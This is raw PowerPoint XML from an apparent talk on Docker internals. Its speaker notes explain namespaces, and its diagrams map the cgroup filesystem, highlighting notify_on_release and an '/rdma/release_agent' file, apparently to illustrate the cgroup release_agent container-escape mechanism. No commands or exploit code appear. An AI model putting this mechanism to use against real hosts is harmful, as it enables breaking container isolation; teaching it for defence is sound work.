              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="3336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92FB69-938A-47E1-912F-E71053CC70E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="1905577"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="333625"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="31034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225FF4-6BE1-4947-896B-873009C1FA44}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="1238326"/>
          <a:ext cx="310349" cy="1000875"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1000875"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="1000875"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="31034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33F0E3-B0A4-4C2D-B72B-7F0D4F300642}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="571075"/>
          <a:ext cx="310349" cy="1668126"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1668126"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="1668126"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="31034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FDD689-D5F4-4069-96E7-C9170A7A8C3F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1531045" y="2002561"/>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/sys/fs/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1531045" y="2002561"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{721D0469-2E74-48C2-96A1-2DB48C6D8AC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="334434"/>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memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="334434"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{01E10AE4-C94B-447A-90DB-EAF63F2883B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="1001685"/>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t>cpuset</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="1001685"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6F1218D-8375-46FB-99C2-A8DE4A1D279C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="1668935"/>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devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="1668935"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DAE3B79-4EFC-4A8E-A54D-4DC1D8E82A63}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="2336186"/>
          <a:ext cx="1551745" cy="473282"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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t>rdma</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="2336186"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE11F320-220F-4740-98E2-3DA62E35DC23}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="334434"/>
          <a:ext cx="1551745" cy="4732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t>child_cgroup</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="334434"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{132917EA-D685-4C86-9AA8-83AC8B2FEDCC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7117329" y="809"/>
          <a:ext cx="1551745" cy="4732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t>notify_on_release</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> = 1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7117329" y="809"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6670B716-0419-41DD-8415-C20950DBA4FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7117329" y="668059"/>
          <a:ext cx="1551745" cy="4732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t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7117329" y="668059"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C78C927-D7C8-4926-9855-4674299C51E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="1001685"/>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t>cgroup.clone_children</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="1001685"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E8C15873-A926-4FE5-AB40-BDD829C3E48A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="1668935"/>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smtClean="0"/>
            <a:t>tasks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="1668935"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41829412-49CC-426E-8108-4B441EEF9E1C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="2336186"/>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smtClean="0"/>
            <a:t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="2336186"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FEFCB4E6-BE5D-4883-84F7-FF7C58722A2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="3003437"/>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smtClean="0"/>
            <a:t>cgroup.sane_behavior</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="3003437"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{26CC1033-BCEA-43AA-B57B-36A9588D59C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="3670687"/>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smtClean="0"/>
            <a:t>notify_on_release</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="3670687"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C62942E-A614-472B-B536-A9D7F28CFFA2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="4337938"/>
          <a:ext cx="1551745" cy="473282"/>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t>release_agent</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="4337938"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE569898-C06B-4265-BDB8-860FF9DBCC02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="3003437"/>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t>pids</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="3003437"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2D6A334D-6275-431E-A2FD-AF076EC0800B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="3670687"/>
          <a:ext cx="1551745" cy="473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t>systemd</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="3670687"/>
        <a:ext cx="1551745" cy="4732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C6EF99-2B52-4825-8639-132F104CF217}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="487614" y="1477353"/>
          <a:ext cx="3079602" cy="587005"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="FFC000"/>
        </a:solid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lvl="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>rdma</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>release_agent</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="487614" y="1477353"/>
        <a:ext cx="3079602" cy="587005"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E8C26862-475C-4C2D-8675-2DD1C439E258}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3698601" y="1137256"/>
          <a:ext cx="495300" cy="1267200"/>
        </a:xfrm>
        <a:prstGeom prst="leftBrace">
          <a:avLst>
            <a:gd name="adj1" fmla="val 35000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:noFill/>
        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{30D5E4A4-B873-461A-97CB-7ABF6C0D4A6B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4260636" y="1450070"/>
          <a:ext cx="5157749" cy="6415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EMPTY</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4260636" y="1450070"/>
        <a:ext cx="5157749" cy="64157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29AEBD-EDC5-49C3-84EF-C4667781D508}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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1D8A07-97E7-4C1A-9693-9D89842C91CA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2684526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moby/moby/blob/master/oci/defaults_linux.go#L64-L79"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of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you have heard this from developers? Quite a lot right? So this is essentially one of the most important challenges that containers solve for us. So using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you can simply create a compact runtime environment for your application to run without worrying about the dependencies on your host.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF96A516-0989-4CB2-9728-6FBD964914C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3838609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smtClean="0"/>
              <a:t>Namespaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Docker uses a technology called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> to provide the isolated workspace called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. When you run a container, Docker creates a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> for that container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are running in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for your own process itself and that gets mapped to certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the host system. Inside containers the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are 1,2,3,4 they are actually mapped to the process on the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There are other namespaces which make it look like running a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and that’s what isolates one container from another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{201D8A07-97E7-4C1A-9693-9D89842C91CA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2122257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Namespaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Docker uses a technology called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> to provide the isolated workspace called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>. When you run a container, Docker creates a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> for that container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are running in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for your own process itself and that gets mapped to certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the host system. Inside containers the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are 1,2,3,4 they are actually mapped to the process on the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There are other namespaces which make it look like running a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and that’s what isolates one container from another.</a:t>
            </a:r>
          </a:p>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4088655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Namespaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
